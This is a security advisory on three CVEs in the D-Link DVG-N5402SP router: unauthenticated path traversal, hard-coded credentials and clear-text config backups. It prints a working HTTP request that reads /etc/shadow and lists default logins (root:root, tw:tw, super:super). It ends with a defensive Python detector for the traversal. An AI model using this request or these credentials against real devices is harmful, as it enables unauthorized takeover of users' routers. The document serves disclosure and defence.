DLink DVG-N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities

*Timelines*

Reported to CERT + Vendor: August 2015
Dlink released beta release: Oct 23, 2015
New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb
No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out

*Vulnerable Models, Firmware, Hardware versions*

DVG-N5402SP Web Management
Model Name : GPN2.4P21-C-CN
Firmware Version : W1000CN-00
Firmware Version : W1000CN-03
Firmware Version : W2000EN-00
Hardware Platform : ZS
Hardware Version : Gpn2.4P21-C_WIFI-V0.05

The device can be managed through three users:
1. super - full privileges
2. admin - full privileges
3. support - restricted user

*1. Path traversal*

Arbitrary files can be read off the device file system by supplying a traversal path in the errorpage parameter of a POST to /cgi-bin/webproc. No authentication is required to exploit this vulnerability.

*CVE-ID*: CVE-2015-7245

*HTTP Request*

POST /cgi-bin/webproc HTTP/1.1
Host: <IP>:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>:8080/cgi-bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

getpage=html%2Findex.html&errorpage=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj-action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

*HTTP Response*

HTTP/1.0 200 OK
pstVal->name:getpage; pstVal->value:html/main.html
pstVal->name:getpage; pstVal->value:html/index.html
pstVal->name:errorpage; pstVal->value:../../../../../../../../../../../etc/shadow
pstVal->name:var:menu; pstVal->value:setup
pstVal->name:var:page; pstVal->value:connected
pstVal->name:var:subpage; pstVal->value:
pstVal->name:obj-action; pstVal->value:auth
pstVal->name::username; pstVal->value:super
pstVal->name::password; pstVal->value:super
pstVal->name::action; pstVal->value:login
pstVal->name::sessionid; pstVal->value:1ac5da6b
Connection: close
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

#root:<hash_redacted>:13796:0:99999:7:::
root:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::

*2. Use of Default, Hard-Coded Credentials*

*CVE-ID*: CVE-2015-7246

The device has two system user accounts configured with default passwords (root:root, tw:tw). The tw login is not active, though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled), leading to loss of integrity, confidentiality, or availability.

*3. Sensitive info leakage via device running configuration backup*

*CVE-ID*: CVE-2015-7247

Usernames, passwords, keys, values and web account hashes (super & admin) are stored in clear text and not masked. Note that the restricted 'support' user may also download this config backup file directly from the portal, gather the clear-text admin credentials, and gain full, unauthorized access to the device.

--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
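For teams monitoring these devices, the traversal in section 1 is easy to spot in captured POST bodies to /cgi-bin/webproc: the errorpage parameter should only ever name a page under html/, so any dot-dot segment in it (including percent-encoded or double-encoded forms) is a clear signal. The detector below is an added example, not part of the advisory; the sample bodies are constructed, modelled on the request shown above, and the parameter names watched (errorpage, getpage) are taken from that request.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample POST bodies to /cgi-bin/webproc, modelled on the advisory's
# request: a normal login, the /etc/shadow traversal, and a percent-encoded variant.
SAMPLE_BODIES = [
    "getpage=html%2Findex.html&errorpage=html%2Ferror.html&var%3Amenu=setup"
    "&obj-action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login",
    "getpage=html%2Findex.html&errorpage=../../../../../../../../../../../etc/shadow"
    "&var%3Amenu=setup&obj-action=auth&%3Aaction=login",
    "getpage=html%2Findex.html&errorpage=%2e%2e%2f%2e%2e%2fetc%2fpasswd&obj-action=auth",
]

# A dot-dot segment delimited by a slash, a backslash, or the string boundary.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def fully_decode(value, rounds=3):
    """URL-decode repeatedly (bounded) so %252e-style double encoding is unwrapped."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(body, watched=("errorpage", "getpage")):
    """Return [(param, decoded_value)] for watched parameters carrying a traversal.

    parse_qs already removes one layer of encoding; fully_decode strips the rest.
    """
    hits = []
    fields = parse_qs(body, keep_blank_values=True)
    for name in watched:
        for raw in fields.get(name, []):
            value = fully_decode(raw)
            if TRAVERSAL.search(value):
                hits.append((name, value))
    return hits


def scan(bodies):
    """Map each body's index to its traversal hits; an empty list means clean."""
    return {i: find_traversal(b) for i, b in enumerate(bodies)}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_BODIES).items():
        print(f"body {idx}: {'ALERT' if hits else 'ok'} {hits}")
```

The same check applies unchanged to proxy or WAF logs that record the decoded form body; bodies 1 and 2 above raise an alert, body 0 does not.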